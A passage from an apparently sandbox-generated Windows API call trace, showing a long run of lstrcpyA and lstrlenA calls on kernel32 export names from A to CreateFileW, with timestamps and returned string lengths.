(lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.820] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.820] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.820] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.820] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.820] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.820] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.820] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.820] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.820] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.820] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.820] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.820] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.820] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.820] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.820] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.821] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.821] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.821] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.821] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.821] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.821] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.821] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.821] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.821] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.821] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.821] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.821] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.821] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.821] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.821] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.821] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.821] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.821] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.821] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.821] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.822] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.822] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.822] lstrlenA (lpString="BEEP") returned 4 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.822] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.822] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.822] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.822] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.822] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.822] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.822] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.822] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.822] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.822] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.822] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.822] lstrlenA (lpString="CANCELIO") returned 8 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.822] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.822] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.822] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.822] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.822] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.822] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.823] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.823] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.823] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.823] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.823] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.823] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.823] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.823] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.823] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.823] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.823] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.823] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.823] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.823] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.823] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.823] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.823] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.823] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.823] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.823] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.824] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.824] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.824] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.824] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.824] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.824] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.824] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.824] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.824] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.824] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.824] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.824] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.824] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.824] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.824] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.824] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.824] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.824] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.824] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.824] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.825] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.825] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.825] lstrlenA (lpString="COPYFILEA") returned 9 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.825] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0180.825] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.825] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.825] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.825] lstrlenA (lpString="COPYFILEW") returned 9 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.825] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.825] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.825] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.825] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.825] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.825] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.825] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.825] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.825] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.825] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.825] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.825] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.826] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.826] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.826] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.826] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.826] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.826] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.826] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.826] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.826] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.826] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.826] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.826] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0180.826] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.826] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileW" | out: 